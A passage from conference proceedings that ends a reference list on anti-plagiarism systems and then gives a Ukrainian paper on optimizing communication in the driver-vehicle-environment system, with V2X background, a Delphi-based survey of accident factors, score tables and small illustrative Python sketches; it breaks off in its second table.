63. Ministry of Education and Science of Ukraine: MoES of Ukraine is Interested That More Companies, Like plagiat.pl, Cooperated with the Ministry to Improve Anti-Plagiarism Checks (2018). https://bit.ly/2HMYtsW
64. CrossRef: About us (2021). https://www.crossref.org/about/
65. Turnitin: iThenticate: Publish with Confidence. Check for Plagiarism with the Tool Academic Publishers Trust (n.d.). https://turnitin.com/products/ithenticate
66. Ministry of Education and Science of Ukraine: A Preliminary Presentation of the National Electronic Research Information System URIS Took Place (2022). https://bit.ly/3bd1PI9
67. Open Ukrainian Citation Index: How It Works (n.d.). https://ouci.dntb.gov.ua/en/about/how-it-works/
68. Kremen, V.H., Lugovyi, V.I., Reheilo, I.Y., Bazeliuk, N.V., Bazeliuk, O.V.: Openness, digitalization and evaluation in research: general and special issues for social studies and humanities. Inf. Technol. Learn. Tools 80(6), 243–266 (2020). https://doi.org/10.33407/itlt.v80i6.4155
Optimization of the Communicative Process in the System "Driver-Vehicle-Environment"
Volodymyr Lytovchenko and Mykola Pidhornyy
Cherkasy State Technological University, Cherkasy, Ukraine
[email protected]
Abstract. The article considers the scheme of the communicative process of interaction between the objects of the "driver-vehicle-environment" (D-V-E) system. The difficulty of this process is that the activities of the objects (participants) in this system have different origins and properties, yet all of them are aimed at a single goal: movement of the vehicle in the environment under the influence of the driver. Each object of the D-V-E system has its own nature of action, which makes it necessary to synchronize them in order to avoid conflicts. When an event arises within the system, each participant involved has its own ways and means of pursuing the main goal. To avoid conflicts, it is proposed to endow each object with a system of properties inherent in a person. The article presents a scheme for optimizing communication relationships based on the reactions of the driver's senses.
Keywords: Communicative process · communicative transport technologies · information system · vehicle · process optimization · multicriteria analysis
1 Introduction
When creating information systems for vehicles, there is a need to choose the best of them. The choice covers the system's structure, connections and external parameters. The choice of the best option should be based on a method that can objectively compare the effectiveness of existing alternatives. The efficiency of the D-V-E system means the degree of its compliance with its purpose. The scientific basis of an objective method for evaluating the effectiveness of D-V-E is a generalized representation of the dynamics of its operation, which leads to a generalized criterion of effectiveness. When creating new systems, two tasks are usually solved: 1) comparison of the technical level of the D-V-E system with the current technical level of development; 2) comparison of the separate alternatives of the D-V-E system among themselves. In the first case, absolute forms of criteria are most often used; in the second, relative ones. The synthesis of the criterion begins with the study of the goal facing the researcher. To achieve this goal, it is necessary to create an orderly process of communication between the objects of the D-V-E system. Achieving the D-V-E goal requires solving lower-order problems, each of which must be performed by a subsystem or group of subsystems that are part of the D-V-E.
Modern automobile corporations use biometric technologies to improve communication between the driver and the vehicle. These technologies are aimed at monitoring biometric parameters and identifying individuals [1–4], primarily to ensure the security of private property. They are gradually extending to the connection between the psychophysical state of the driver and the process of driving a vehicle. The development of information technologies and the introduction of the networking capabilities of the Internet expand the communication capabilities of the D-V-E system. At the top of automotive communication systems is the concept of "Vehicle to Everything Communications" (V2X) [5–9]. The concept is not new to the automotive industry, but the technology to realize it, as well as the necessary communication standards, became available only several years ago. V2X is the umbrella category for the wide range of communication technologies needed to connect the vehicle to the world and to the driver in the D-V-E system. V2X is not a static set of communication processes; it embodies the synergy between different technologies. There are seven types of vehicle applications in the V2X concept: 1) vehicle to network (V2N); 2) vehicle to infrastructure (V2I); 3) vehicle to vehicle (V2V); 4) vehicle to cloud (V2C); 5) vehicle to pedestrian (V2P); 6) vehicle to device (V2D); 7) vehicle to grid (V2G). V2N allows vehicles to use cellular networks to communicate with the V2X control system; it also uses a dedicated short-range communication standard (DSRC) to interact with other vehicles and with road infrastructure. V2I is an integral part of Intelligent Transport Systems (ITS) and consists of the two-way exchange of information between vehicles and road infrastructure. This information includes data on vehicle movement collected from other vehicles, data from sensors installed in the road infrastructure (cameras, traffic lights, lanterns, road signs, parking meters, etc.), as well as data transmitted from the ITS (speed limits, weather conditions, accidents, etc.). V2V allows vehicles to exchange data in real time over the same DSRC links used in V2I communication. V2C uses V2N access to broadband cellular networks to communicate with the cloud. V2P creates a communicative Internet connection between vehicles and pedestrians. V2D is a subset of V2X communication that allows vehicles to share information with any smart device, usually via Bluetooth (Apple CarPlay and Google Android Auto). V2G provides bidirectional data exchange between electric vehicles and the power grid. The purpose of this publication is to optimize the system of interaction between the driver, the vehicle and the environment by streamlining the communication processes in the D-V-E system.
Formulation of the problem. Many automakers integrate information technology into vehicles. Such intelligent systems monitor the environment, vehicle performance, the interior, and the driver's biometric data. The biggest obstacle in the development of an intelligent system is the disordered processes of interaction in the ITS [10]. Instead of moving toward autonomous vehicles, this approach increases the workload of drivers. The following problems arise in the transition from the current vehicle to an intelligent vehicle based on modern vehicles. The existing transport infrastructure needs to be
upgraded to ensure the full integration of intelligent vehicles while remaining usable for conventional vehicles. Current driving paradigms will therefore have to change with the levels of intellectualization and autonomy [11, 12]. Current research on intelligent vehicles for creating a communicative D-V-E system mainly covers the following aspects [13]: 1) analysis of the behavior, facial expressions and emotional state of drivers; 2) perception of the environment through the synergy of monitoring and analysis systems; 3) limits of the driver's reaction and psychophysical properties; 4) combination of the vehicle management model with environmental data obtained from environmental perception, for implementing the communication process of the V-E subsystem; 5) study of kinematics, dynamics modelling and control within the vehicle traffic control system to create a knowledge base for further intellectualization; 6) active safety systems focused on avoiding obstacles and collisions in various cases, which do not participate in the decision-making processes of the intelligent system but only coordinate; 7) traffic monitoring, navigation and coordination of vehicles, mainly studying the organization of traffic flows; 8) V2V interaction and communication without event forecasting; 9) military applications of intelligent vehicle systems, confined to military vehicles; 10) the vehicle considered only in terms of its structure and the organization of its intellectualization, which limits the communicative processes of the D-V-E system; 11) vehicle safety, investigating the avoidance of road accidents and the expansion of intellectual functions.
Sensation is the simplest cognitive process of reflecting in the brain certain qualities and properties of objects due to the action of a stimulus on the analyzer. The most common sensations are visual, auditory and tactile (touch). The automation of the D-V-E system should reduce the entropy of the human senses involved in controlling the system as a whole and create for the driver an information flow of a control and analytical nature. In modern transport systems, automation is limited. If the automation of vehicles is represented as levels, the widely used Advanced Driver Assistance Systems (ADAS) correspond to the levels defined by the Society of Automotive Engineers (SAE) [14, 15] and are intended to assist drivers by simplifying driving tasks or by partially or completely eliminating the driver's involvement. ADAS directly affects the performance of the driver. Experienced drivers perform most driving tasks at the level of rules or skills, so the probability of errors is low. Successful performance of a knowledge-based task depends largely on the driver's fundamental cognitive abilities to diagnose and analyze situations. Accordingly, by expanding the knowledge base, intelligent vehicles should mimic the psychological structure of a human, i.e. accumulate situational awareness [16, 17]. SAE levels are determined by the activities and responsibilities of the driver while driving, not by the capabilities of the vehicle's autonomous system. The levels cannot capture all the effects that the technology will have on the model of movement, operation and safety of vehicles [18]. At each level there are certain kinds of conflicts. At the lower levels, the driver's influence on the system increases, and therefore there is a greater probability of dangerous movement due to the human factor.
But with an increase in the level of automation and autonomy, the driver's role shifts toward that of an observer. Such operating conditions of the vehicle are also dangerous. They are associated with a
302
V. Lytovchenko and M. Pidhornyy
number of hazards, such as: failure to intervene when necessary; excessive trust in hardware and software; loss of situational awareness; deterioration of work skills; intermittent mental load; behavioral adaptation; an inadequate mental model of automation capabilities; and skills degradation. Since intervention often occurs unexpectedly and requires a rapid response, this task is difficult and causes a high load. At this level of autonomy, partially automated driving changes the role of the driver from active control of the vehicle to passive supervision of automation. The driver acts as the operator of an automatic system that, by its intended purpose, is separated from the D-V-E system. The system fragments into subsystems (D-V, V-E, D-E), which leads to divergence and an inability to perform the common, basic task.
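As a compact illustration of the role shift discussed above, the sketch below encodes a simplified reading of the SAE J3016 levels and flags where the driver still supervises and where takeover requests arise. The level summaries follow the public SAE taxonomy; the helper predicates are our own illustrative assumptions, not part of the standard.

```python
# A minimal sketch, assuming a simplified reading of the SAE J3016 levels.
SAE_LEVELS = {
    0: "No automation: the driver performs the entire dynamic driving task",
    1: "Driver assistance: steering or acceleration support, driver in control",
    2: "Partial automation: combined support, driver must monitor constantly",
    3: "Conditional automation: system drives, driver must take over on request",
    4: "High automation: no driver takeover needed within the design domain",
    5: "Full automation: no driver needed under any conditions",
}

def driver_must_supervise(level: int) -> bool:
    """Illustrative assumption: at levels 0-2 the driver actively supervises."""
    return level <= 2

def takeover_request_possible(level: int) -> bool:
    """Illustrative assumption: only level 3 relies on driver takeover requests."""
    return level == 3

if __name__ == "__main__":
    for level, description in SAE_LEVELS.items():
        print(f"L{level}: {description}; supervise={driver_must_supervise(level)}")
```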
2 Materials and Methods
The complexity of automating the D-V-E system is associated with numerous negative processes, such as: failure to intervene when necessary; excessive trust in hardware and software; loss of situational awareness; deterioration of work skills; behavioral adaptation; an inadequate mental model of automation capabilities; and stagnation of driving skills. Since intervention often occurs unexpectedly and requires a rapid response, this task is difficult and places a high load on the driver. The authors conducted the research on the basis of the Cherkasy Scientific Research Forensic Center of the Ministry of Internal Affairs of Ukraine (Cherkasy SRFC of the MIA of Ukraine), located at: Ukraine, 18009, Cherkasy region, Cherkasy city, Pasterivska st., building 104. The research was carried out within the framework of cooperation between Cherkasy State Technological University and the Center under cooperation agreement No. 13-D dated February 21, 2020. Surveys were conducted from May to September 2021. The obtained data were used to form the factors that lead to the deterioration of the operating conditions of the vehicle, misinformation of the driver, and an increased risk of road accidents in general. The factors are divided into groups. It is assumed that a factor has already taken place or been implemented, and that it concerns the driver rather than the passengers. Three evaluation criteria were used: 1) the severity of the consequences, which determines the degree of impact on the performance of the vehicle after the event; 2) the probability of occurrence, which indicates how likely it is that the factor will occur; 3) the significance of the action, which characterizes how important the factor is for the vehicle to fulfill its main purpose (movement in space). Each factor is evaluated against each criterion from 1 to 10 (where 1 is a very low level of influence and 10 is a very high level of influence). The research was conducted through questionnaires, surveys, methods of collective expert evaluation and multicriteria analysis. Five hundred respondents from various fields of activity related to the operation of vehicles were interviewed, and four automotive scientists holding scientific degrees were invited as experts; the survey was conducted by the authors of the publication. The results are summarized in Table 1. An assessment was given to each respondent by the method of multicriteria analysis [19].
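A minimal sketch of the assessment record implied by this scheme, assuming our own class and field names: each factor is scored on the three criteria using the 1–10 scale described above.

```python
from dataclasses import dataclass

@dataclass
class FactorAssessment:
    """One evaluator's scores for one factor, on the 1-10 scale used in the survey."""
    factor: str        # e.g. "1.4. Road accident"
    severity: int      # severity of the consequences (table column "Weight")
    probability: int   # probability of occurrence
    significance: int  # significance of the action

    def __post_init__(self) -> None:
        for name in ("severity", "probability", "significance"):
            value = getattr(self, name)
            if not 1 <= value <= 10:
                raise ValueError(f"{name} must be between 1 and 10, got {value}")

# Example: one respondent's assessment of one factor (illustrative numbers).
example = FactorAssessment("1.4. Road accident", severity=7, probability=6, significance=7)
```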
3 Experiments
To solve the problem of evaluating respondents using the methods of multicriteria analysis, the results of the individual expert survey were processed first. The expert survey was conducted according to the Delphi method, the most common questionnaire-based method, in which there are no direct collective discussions and the result does not depend on any single expert's answers. The obtained assessments were weighted by multiplying them by each expert's coefficient of competence, determined by collective expert assessment. Given that the number of experts was small, that their activities were related to ITS, and that all of them were specialists holding scientific degrees, the coefficients of competence were virtually the same. The next stage in forming the evaluation of results was computing the arithmetic mean for each factor; in this way, an assessment of the impact factors according to the three criteria above was obtained from the respondents. The results of the factor assessments are shown in Table 1. Respondents' assessments may differ significantly from expert assessments because of the coefficients of competence, awareness and argumentation. To compare the survey results of experts and respondents objectively, the authors used a master key of assessments, which provides unified estimates for comparing survey results. Comparing only the assessments of respondents and experts would not be objective for a number of reasons: the variety of vehicles used by the respondents, the respondents' ages, their total driving experience, the different locations of their vehicles, the different intensity of vehicle operation, the purposes of the vehicles used, and diverse social attitudes toward vehicles.
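A minimal sketch of the aggregation described above, with illustrative numbers: expert scores are weighted by competence coefficients, respondent scores are averaged arithmetically, and both can then be set against the unified master-key estimate. Function names and the sample values are our own assumptions.

```python
def weighted_expert_score(scores, competence):
    """Competence-weighted mean of expert scores for one factor and criterion."""
    assert len(scores) == len(competence)
    return sum(s * c for s, c in zip(scores, competence)) / sum(competence)

def respondent_score(scores):
    """Plain arithmetic mean of respondent scores for one factor and criterion."""
    return sum(scores) / len(scores)

# Illustrative numbers only: four experts with near-equal competence, as in the study.
experts = [8, 8, 7, 8]
competence = [1.0, 1.0, 0.95, 1.0]
respondents = [6.7, 7.1, 6.4, 6.8]  # a small sample standing in for 500 answers

expert_estimate = weighted_expert_score(experts, competence)
respondent_estimate = respondent_score(respondents)
master_key = 9  # unified reference estimate for the same factor/criterion
print(f"experts={expert_estimate:.2f}, respondents={respondent_estimate:.2f}, key={master_key}")
```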
Table 1. Summary table for assessing the factors of influence on the results of the survey
(W = weight, P = probability, S = significance; columns are grouped by Respondent, Expert and Master key assessments.)

| Name of group/factor | Resp. W | Resp. P | Resp. S | Exp. W | Exp. P | Exp. S | Key W | Key P | Key S |
|---|---|---|---|---|---|---|---|---|---|
| 1. Strategic level group (route planning) | | | | | | | | | |
| 1.1. Traffic intensity | 4.3 | 4.9 | 5.1 | 4 | 4 | 5 | 6 | 3 | 3 |
| 1.1.1. Low | 3.1 | 4.8 | 5.0 | 4 | 5 | 5 | 5 | 3 | 1 |
| 1.1.2. Average | 4.2 | 4.8 | 5.0 | 4 | 5 | 5 | 5 | 4 | 3 |
| 1.1.3. High | 4.9 | 5.0 | 5.3 | 5 | 5 | 5 | 6 | 4 | 4 |
| 1.1.4. Above high | 5.2 | 5.2 | 5.3 | 5 | 5 | 5 | 8 | 1 | 5 |
| 1.2. Deviation from the route | 8.3 | 5.1 | 8.8 | 4 | 4 | 4 | 2 | 5 | 6 |
| 1.3. Change of destination | 3.0 | 3.7 | 3.3 | 3 | 3 | 3 | 1 | 1 | 3 |
| 1.4. Road accident | 6.7 | 5.9 | 6.8 | 8 | 5 | 8 | 9 | 5 | 9 |
| 1.5. Gestures of the regulator or other drivers | 1.3 | 0.8 | 2.3 | 2 | 2 | 2 | 1 | 1 | 4 |
| 1.6. Vehicle damage | 6.7 | 5.5 | 6.5 | 7 | 6 | 6 | 7 | 3 | 8 |
| 1.7. Inexperience of the driver of the vehicle | 6.7 | 6.4 | 6.7 | 8 | 4 | 8 | 5 | 5 | 5 |
| 1.8. Changing the direction of movement of other vehicles | 5.6 | 4.4 | 4.1 | 5 | 5 | 5 | 1 | 5 | 2 |
| 1.9. Seizure or misappropriation of a vehicle | 7.6 | 6.0 | 6.9 | 9 | 5 | 10 | 1 | 3 | 1 |
| 1.10. Lack of road signs and markings | 6.9 | 6.6 | 6.6 | 7 | 7 | 7 | 1 | 2 | 5 |
| 1.11. Violation of traffic rules | 9.1 | 5.6 | 8.2 | 8 | 8 | 8 | 9 | 2 | 8 |
| 1.11.1. Alcohol or drug intoxication | 9.0 | 8.0 | 8.7 | 9 | 9 | 9 | 10 | 3 | 10 |
| 1.11.2. Exceeding the allowable speed | 7.7 | 7.6 | 7.6 | 8 | 8 | 8 | 9 | 6 | 3 |
| 1.11.3. Mobile phone conversations | 4.1 | 5.8 | 4.8 | 4 | 4 | 4 | 2 | 6 | 1 |
| 1.11.4. Use of defective vehicle | 7.5 | 6.5 | 7.0 | 8 | 4 | 8 | 9 | 1 | 10 |
| 1.11.5. Conversations with passengers | 2.2 | 3.6 | 2.0 | 3 | 3 | 3 | 1 | 5 | 1 |
| 1.11.6. Smoking while driving | 1.0 | 2.6 | 1.1 | 2 | 2 | 2 | 1 | 4 | 1 |
| 1.11.7. Eating while driving | 2.3 | 2.0 | 1.8 | 2 | 2 | 2 | 2 | 2 | 1 |
| 1.11.8. Management of electronic means while driving | 6.1 | 5.9 | 5.8 | 5 | 5 | 5 | 2 | 5 | 2 |
| 1.11.9. Listening to music | 1.1 | 6.3 | 4.1 | 6 | 6 | 8 | 1 | 6 | 1 |
| 1.12. Ignore security | 7.0 | 6.9 | 6.8 | 9 | 5 | 9 | 3 | 3 | 5 |
| 1.12.1. Unbuckled seat belts | 6.6 | 5.8 | 5.4 | 8 | 8 | 8 | 2 | 4 | 2 |
| 1.12.2. Defective active and passive safety devices | 7.7 | 8.2 | 5.4 | 9 | 4 | 9 | 2 | 2 | 2 |
| 1.12.3. Lack of security measures | 9.1 | 5.6 | 8.4 | 9 | 5 | 10 | 2 | 6 | 3 |
| 1.12.4. Extra items in the cabin and on the body of the vehicle | 5.2 | 4.8 | 4.9 | 4 | 4 | 4 | 4 | 4 | 4 |
| 1.12.5. Dangerous position of the driver and passengers | 6.3 | 5.4 | 5.3 | 8 | 4 | 8 | 6 | 2 | 2 |
| 1.13. Changes in the psychophysical condition and health of the driver | 6.8 | 5.8 | 6.4 | 8 | 8 | 8 | 9 | 2 | 8 |
| 1.13.1. Fatigue | 6.8 | 6.5 | 6.8 | 7 | 7 | 7 | 6 | 3 | 3 |
| 1.13.2. Drowsiness | 7.0 | 6.2 | 6.6 | 6 | 6 | 6 | 5 | 2 | 2 |
| 1.13.3. Dizziness | 6.9 | 5.6 | 6.5 | 6 | 6 | 6 | 8 | 1 | 8 |
| 1.13.4. Anxiety | 6.8 | 4.3 | 6.7 | 7 | 4 | 7 | 1 | 1 | 1 |
| 1.13.5. Decreased observation | 6.8 | 5.1 | 6.8 | 8 | 4 | 9 | 3 | 1 | 1 |
| 1.13.6. The effect of drugs | 7.3 | 6.7 | 6.8 | 8 | 4 | 8 | 5 | 1 | 1 |
| 1.13.7. The effect of alcohol and drugs | 9.2 | 8.2 | 6.8 | 10 | 6 | 9 | 10 | 3 | 10 |
| 1.13.8. The medical examination was not performed properly | 4.1 | 4.3 | 4.0 | 3 | 3 | 3 | 1 | 1 | 1 |
| 1.13.9. Blinding | 7.0 | 6.0 | 6.6 | 6 | 6 | 6 | 3 | 3 | 3 |
| 1.13.10. Allergy | 7.0 | 5.4 | 6.8 | 4 | 4 | 4 | 1 | 1 | 1 |
| 1.13.11. Occurrence of a stressful situation | 6.2 | 5.6 | 6.1 | 8 | 8 | 8 | 2 | 2 | 2 |
| 2. Operational level group (route movement) | | | | | | | | | |
| 2.1. Poor visibility | 5.9 | 6.3 | 5.3 | 8 | 4 | 8 | 7 | 3 | 3 |
| 2.2. Guilt of another traffic participant | 4.3 | 5.2 | 5.2 | 6 | 6 | 6 | 5 | 5 | 5 |
| 2.2.1. Random | 4.3 | 5.1 | 5.5 | 6 | 6 | 6 | 5 | 5 | 5 |
| 2.2.2. Not accidental | 4.2 | 5.2 | 5.0 | 6 | 6 | 6 | 5 | 5 | 5 |
| 2.3. Hitting an obstacle | 6.7 | 5.7 | 6.2 | 6 | 6 | 6 | 2 | 1 | 1 |
| 2.4. Reduction of braking distance | 6.1 | 3.3 | 4.1 | 3 | 3 | 3 | 2 | 1 | 2 |
| 2.5. The presence of sound signals | 5.0 | 5.0 | 4.2 | 4 | 5 | 4 | 1 | 3 | 1 |
| 2.6. Abrupt changes in the direction of movement | 6.3 | 6.0 | 7.2 | 8 | 8 | 8 | 4 | 2 | 2 |
| 2.7. Negligent attitude to the technical condition of the vehicle | 6.2 | 6.2 | 4.8 | 8 | 4 | 8 | 6 | 2 | 2 |
| 2.8. Traffic accident | 7.3 | 6.1 | 7.0 | 10 | 4 | 9 | 5 | 5 | 9 |
| 2.8.1. With the participation of vehicle | 7.3 | 6.3 | 7.0 | 10 | 4 | 9 | 5 | 5 | 9 |
| 2.8.2. Without the participation of the vehicle | 7.3 | 6.0 | 6.8 | 10 | 4 | 9 | 5 | 5 | 9 |
| 2.9. Occurrence of an emergency situation | 7.2 | 5.6 | 6.3 | 9 | 4 | 9 | 10 | 3 | 10 |
| 2.9.1. Observation error | 6.1 | 5.5 | 5.9 | 8 | 5 | 8 | 8 | 2 | 6 |
| 2.9.2. Wrong decision or action | 8.5 | 4.8 | 6.7 | 9 | 5 | 8 | 7 | 2 | 6 |
| 2.9.3. Insufficient reaction | 6.3 | 5.9 | 6.1 | 8 | 4 | 8 | 7 | 2 | 6 |
| 2.9.4. An unpredictable situation | 8.2 | 6.5 | 6.6 | 8 | 4 | 8 | 5 | 2 | 6 |
| 2.10. Lack of a planned route | 4.4 | 2.1 | 2.4 | 3 | 3 | 3 | 1 | 1 | 1 |
| 2.11. Unknown location for the driver | 6.2 | 6.0 | 3.3 | 4 | 4 | 4 | 1 | 1 | 1 |
| 2.12. Low wheel grip | 5.9 | 5.8 | 5.8 | 6 | 6 | 6 | 2 | 1 | 1 |
| 2.13. Unplanned stop | 6.2 | 5.1 | 5.8 | 4 | 4 | 4 | 1 | 1 | 1 |
| 2.13.1. Unforeseen damage to the vehicle | 5.6 | 4.9 | 4.8 | 8 | 4 | 4 | 4 | 2 | 2 |
| 2.13.2. Failure of the power unit | 5.9 | 5.0 | 5.6 | 8 | 3 | 3 | 6 | 2 | 2 |
| 2.13.3. Failure of electrical equipment | 5.5 | 4.6 | 5.2 | 7 | 3 | 3 | 6 | 2 | 2 |
| 2.13.4. Control system failure | 7.6 | 6.1 | 7.4 | 7 | 4 | 4 | 6 | 2 | 2 |
| 2.14. Vehicle overload | 4.8 | 4.4 | 3.6 | 4 | 4 | 4 | 2 | 1 | 1 |
| 2.15. Number of passengers | 5.6 | 4.8 | 4.7 | 3 | 3 | 3 | 1 | 1 | 1 |
| 2.16. Finding foreign objects on the road | 6.2 | 4.4 | 6.4 | 4 | 4 | 4 | 2 | 2 | 2 |
| 3. Tactical level group (vehicle component management) | | | | | | | | | |
| 3.1. Position of governing bodies | 4.4 | 4.0 | 4.1 | 4 | 4 | 4 | 1 | 1 | 1 |
| 3.2. Type of drive | 3.1 | 3.1 | 3.0 | 4 | 4 | 4 | 1 | 1 | 1 |
| 3.3. Number of drive wheels | 3.2 | 3.0 | 3.1 | 3 | 3 | 3 | 1 | 1 | 1 |
| 3.4. Position of the center of mass of the vehicle | 3.0 | 2.8 | 2.5 | 2 | 2 | 2 | 1 | 1 | 1 |
| 3.5. Overall dimensions of the vehicle | 2.6 | 3.9 | 3.9 | 4 | 4 | 4 | 1 | 1 | 1 |
| 3.6. Engine failure | 5.2 | 4.2 | 4.8 | 6 | 4 | 6 | 8 | 2 | 10 |
| 3.6.1. Inconsistency of energy source for traffic (diesel fuel, gasoline, etc.) | 6.8 | 4.4 | 6.6 | 8 | 4 | 8 | 8 | 2 | 10 |
| 3.6.2. Breakdowns of the fuel or energy supply system | 7.7 | 7.1 | 7.2 | 8 | 2 | 8 | 8 | 2 | 9 |
| 3.6.3. Loss of ignition and start of movement of engine elements | 6.8 | 6.1 | 6.0 | 4 | 4 | 4 | 2 | 2 | 2 |
| 3.6.4. Insufficient power for a specific vehicle | 4.1 | 2.1 | 2.8 | 4 | 1 | 4 | 2 | 2 | 2 |
| 3.6.5. Engine overload | 5.5 | 5.1 | 5.3 | 5 | 5 | 5 | 5 | 1 | 3 |
| 3.6.6. Periodic replacement of lubricating fluids and mechanical components was not performed | 7.8 | 4.6 | 4.8 | 8 | 4 | 8 | 1 | 1 | 3 |
| 3.6.7. Not high-quality combustion gases | 2.1 | 1.8 | 1.9 | 2 | 2 | 2 | 1 | 1 | 2 |
| 3.6.8. A sharp push on the accelerator pedal by the driver | 1.2 | 2.2 | 3.1 | 2 | 2 | 2 | 1 | 3 | 1 |
| 3.7. Vehicle transmission failure | 5.3 | 4.8 | 5.3 | 8 | 3 | 8 | 8 | 2 | 7 |
| 3.7.1. Inconsistency of gear shifting | 5.4 | 4.1 | 4.1 | 6 | 4 | 6 | 6 | 2 | 5 |
| 3.7.2. Improper engine grip | 4.9 | 4.2 | 4.8 | 5 | 3 | 4 | 6 | 2 | 6 |
| 3.7.3. Overload on the driving wheels | 5.4 | 4.7 | 5.6 | 6 | 3 | 3 | 4 | 2 | 4 |
| 3.7.4. Insufficient lubricant level | 3.2 | 1.1 | 2.8 | 6 | 1 | 5 | 2 | 1 | 2 |
| 3.7.5. A sharp change in gear ratio | 5.8 | 4.3 | 4.2 | 5 | 2 | 4 | 5 | 2 | 4 |
| 3.7.6. Control system malfunction | 5.5 | 4.8 | 5.5 | 7 | 4 | 7 | 8 | 1 | 7 |
| 3.8. Chassis failure | 5.9 | 5.2 | 5.8 | 6 | 4 | 6 | 8 | 2 | 7 |
| 3.8.1. Power flow transmission gap | 4.2 | 3.7 | 4.2 | 4 | 4 | 4 | 5 | 2 | 5 |
| 3.8.2. Damping system failure | 6.3 | 3.4 | 5.4 | 8 | 2 | 7 | 5 | 2 | 5 |
| 3.8.3. Hitting an obstacle | 4.8 | 3.3 | 6.1 | 7 | 3 | 5 | 1 | 2 | 2 |
| 3.9. Brake system failure | 7.9 | 6.8 | 7.6 | 8 | 2 | 8 | 5 | 2 | 6 |
| 3.10. Steering system failure | 4.1 | 4.1 | 4.2 | 8 | 2 | 8 | 5 | 2 | 6 |
| 3.11. Trailer control | 4.2 | 4.1 | 4.2 | 4 | 4 | 4 | 1 | 3 | 2 |
| 3.12. Application of windshield wipers | 2.1 | 3.6 | 1.0 | 2 | 5 | 2 | 1 | 8 | 2 |
| 3.13. Application of optical devices | 2.3 | 3.8 | 1.2 | 2 | 6 | 2 | 1 | 9 | 2 |
| 3.14. Application of sound devices | 0.8 | 2.4 | 1.0 | 4 | 4 | 4 | 1 | 8 | 2 |
| 4. Environmental change group | | | | | | | | | |
| 4.1. Road coverage | 5.1 | 3.6 | 4.8 | 6 | 10 | 6 | 6 | 10 | 10 |
| 4.1.1. Smooth | 3.1 | 8.8 | 3.6 | 1 | 7 | 8 | 2 | 7 | 9 |
| 4.1.2. Rough | 5.0 | 5.4 | 5.0 | 8 | 2 | 8 | 6 | 3 | 9 |
| 4.1.3. With potholes | 5.2 | 5.2 | 5.3 | 6 | 4 | 6 | 6 | 4 | 8 |
| 4.1.4. With obstacles | 3.3 | 3.3 | 3.4 | 8 | 2 | 7 | 6 | 4 | 8 |
| 4.1.5. Dry | 2.6 | 3.2 | 3.4 | 2 | 8 | 8 | 2 | 8 | 8 |
| 4.1.6. Wet | 6.6 | 2.5 | 6.1 | 7 | 3 | 6 | 4 | 2 | 9 |
| 4.1.7. Sludge (wet snow) | 7.4 | 2.1 | 3.3 | 8 | 2 | 6 | 5 | 2 | 9 |
| 4.1.8. Ice | 7.8 | 3.1 | 5.5 | 8 | 1 | 8 | 6 | 1 | 9 |
| 4.2. Spatial position of the vehicle | 4.1 | 7.9 | 6.3 | 4 | 10 | 7 | 1 | 10 | 10 |
| 4.3. Curvature of the trajectory | 8.8 | 4.6 | 7.7 | 6 | 8 | 8 | 2 | 7 | 7 |
| 4.4. Nebula and humid air | 5.3 | 5.0 | 5.5 | 7 | 2 | 7 | 2 | 4 | 4 |
| 4.5. Direction and speed of air flow | 2.8 | 3.0 | 3.2 | 3 | 3 | 3 | 3 | 2 | 2 |
| 4.6. Lack of road signs | 3.0 | 3.7 | 3.4 | 7 | 2 | 7 | 2 | 2 | 2 |
| 4.7. Lack of road markings | 2.8 | 3.3 | 3.5 | 7 | 2 | 7 | 2 | 2 | 2 |
| 4.8. Road lighting | 4.5 | 4.5 | 4.8 | 8 | 3 | 8 | 2 | 10 | 1 |
| 4.8.1. Daylight | 6.3 | 5.4 | 5.3 | 3 | 3 | 3 | 2 | 8 | 2 |
| 4.8.2. Evening and morning light | 2.3 | 3.3 | 3.3 | 4 | 4 | 4 | 3 | 2 | 2 |
| 4.8.3. Night lighting | 5.1 | 6.0 | 5.8 | 8 | 6 | 8 | 3 | 1 | 2 |
| 4.8.4. Intensity and direction of illumination | 2.3 | 3.3 | 3.3 | 7 | 7 | 7 | 3 | 10 | 2 |
| 4.9. Contamination of vehicles | 4.4 | 4.2 | 4.2 | 4 | 4 | 4 | 1 | 2 | 2 |
The survey results are presented as diagrams of factor estimates by respondents (Fig. 1) and by experts (Fig. 2), together with a diagram of the master key estimates (Fig. 3). According to these results, factors related to the technical condition of the vehicle and to the psychophysical condition of the driver prevail. Therefore, communication and interaction in the D-V subsystem outweigh those in the V-E and D-E subsystems within the overall D-V-E system. Given the levels of automation, communication technologies should be introduced at the third, fourth and fifth levels [14, 15]. Table 1 highlights the factors directly related to the communication links of the D-V-E system that significantly affect the avoidance of internal system conflicts and the psychophysical state of the driver. Weight and probability are constant criteria across all levels of automation, as their importance does not change; their values are listed in Table 1 among the master key values for each factor. Table 2 gives an estimate from 0 to 10 of the impact of factors on the D-V-E system as the vehicle's level of automation changes.
Fig. 1. Diagram of evaluation of respondents' survey results
Fig. 2. Diagram of the results of factor assessment by experts
Fig. 3. Master key evaluation chart
Table 2. Estimates of communicative factors of influence in the D-V-E system

| Name of group/factor | Significance, 3rd level | Significance, 4th level | Significance, 5th level |
|---|---|---|---|
| Strategic level group (route planning) | | | |
| 1.1. Road accident | 9 | 7 | 6 |
| 1.2. Gestures of the regulator or other drivers | 2 | 2 | 1 |
| 1.3. Inexperience of the driver of the vehicle | 4 | 3 | 0 |
| 1.4. Changing the direction of movement of other vehicles | 1 | 1 | 0 |
| 1.5. Violation of traffic rules | 7 | 7 | 8 |
| 1.5.1. Alcohol or drug intoxication | 8 | 7 | 6 |
| 1.5.2. Exceeding the allowable speed | 2 | 2 | 1 |
| 1.5.3. Mobile phone conversations | 1 | 1 | 1 |
| 1.5.4. Conversations with passengers | 1 | 1 | 0 |
| 1.5.5. Smoking while driving | 1 | 1 | 0 |
| 1.5.6. Eating while driving | 1 | 1 | 0 |
| 1.5.7. Management of electronic means while driving | 2 | 1 | 1 |
| 1.5.8. Listening to music | 1 | 1 | 1 |
| 1.6. Changes in the psychophysical condition and health of the driver | 6 | 6 | 5 |
| 1.6.1. Fatigue | 3 | 2 | 1 |
| 1.6.2. Drowsiness | 1 | 1 | 1 |
| 1.6.3. Dizziness | 8 | 7 | 6 |
| 1.6.4. Anxiety | 1 | 1 | 1 |
| 1.6.5. Decreased observation | 1 | 1 | 1 |
| 1.6.6. The effect of drugs | 1 | 1 | 1 |
| 1.6.7. The effect of alcohol and drugs | 9 | 7 | 6 |
| 1.6.8. Blinding | 3 | 2 | 1 |
| 1.6.9. Occurrence of a stressful situation | 1 | 1 | 1 |
| Operational level group (route movement) | | | |
